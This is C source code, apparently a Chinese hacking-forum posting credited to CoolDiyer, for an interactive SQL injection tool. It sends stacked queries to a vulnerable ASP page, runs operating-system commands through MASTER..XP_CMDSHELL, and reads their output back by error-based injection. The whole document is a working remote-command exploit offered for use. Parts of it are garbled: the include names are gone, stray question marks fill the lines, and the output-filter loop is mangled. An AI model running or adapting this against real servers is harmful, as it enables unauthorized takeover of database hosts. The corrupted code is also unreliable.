Sql注入SA权限CMD终结者C源码

Poered By CoolDiyer
//??由于时间问题，没加注释学过C的应该都能看懂
//////////////////////////////////////////////////////////////////////////////////////////////////////
#include
#include
#include
#include
#pragma comment(lib, "wininet.lib")
char *injurl,*type,*end;
char *GetResult(char *url)
{
? char buffer[1024*8];
? DWORD dwBytesRead=0;
? HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
? HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
? BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
? InternetCloseHandle(hUrlFile);
? InternetCloseHandle(hNet);
? return buffer;
}
char *ExecCommand(char *cmd)
{
? char url[1024],buff[1024],result[1024],*response,*p,*p1;
? int n=1,i,j;
? memset(url,0,sizeof(url));
? wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [SIC_Tmp](ResultTxt) EXEC MASTER..XP_CMDSHELL %s;insert into [SIC_Tmp] values ([g_over])--",injurl,type,cmd);
? response=GetResult(url);
? while(1){
? memset(buff,0,sizeof(buff));
? memset(result,0,sizeof(result));
? wsprintf(url,"%s%s and (select top 1 case when ResultTxt is Null then [CoolDiyer][CoolDiyer] else [CoolDiyer]%%2BResultTxt%%2B[CoolDiyer] end from (select top %d id,ResultTxt from [SIC_Tmp] order by [id]) T order by [id] desc)>0%s",injurl,type,n,end);
? response=GetResult(url);
? if(p=strstr(response,"[CoolDiyer]"))p1=strstr(p+11,"[CoolDiyer]");
??? else {
??????? puts("Cannt Injection It");
??????? return;
??? }
? strncpy(buff,p+11,p1-p-11);
? if (!strcmp(buff,"[g_over]")){
??? wsprintf(url,"%s%s;DROP TABLE [SIC_Tmp]--",injurl,type);
??? GetResult(url);
??? return;
? }
? //filter
? for(i=0,j=0;i????if(buff==& && buff[i+2]==t && buff[i+3]==;){
????? if (buff[i+1]==l)result[j]=<;
????? if (buff[i+1]==g)result[j]=>;
????? i+=3;
??? }
??? else if(buff==& && buff[i+1]==q && buff[i+2]==u && buff[i+3]==o && buff[i+4]==t && buff[i+5]==;){
????? result[j]=";
????? i+=5;
??? }
????? else result[j]=buff;
??? }
? puts(result);
? memset(url,0,sizeof(url));
? n++;
? }
}
void main(int argc,char **argv)
{
? char cmd[1024];
??? printf("=[Sql Inj CMD]====================================================== ");
??? printf(" SQL Injection Command Exploit Powered By CoolDiyer ");
??? if(argc!=3){
??? printf(" Usage:?sqlcmd.exe ");
??? printf(" Type: 0->Number??1->char??2->Search ");
??? printf(" Example: sqlcmd.exe http://localhost/index.asp?id=1 0 ");
??? printf("=05-12-22=========================================================== ");
??? return;
? }
? injurl=argv[1];
? if(atoi(argv[2])==0){
??? type="";
??? end="";
? }
? if(atoi(argv[2])==1){
??? type="";
??? end=" and =";
? }
? if(atoi(argv[2])==2){
??? type="%";
??? end=" and %=";
? }
? while (1)
? {
? printf("Sql Inj CMD>");
? gets(cmd);
? if (!strcmpi(cmd,"exit"))return;
? ExecCommand(cmd);
? }
}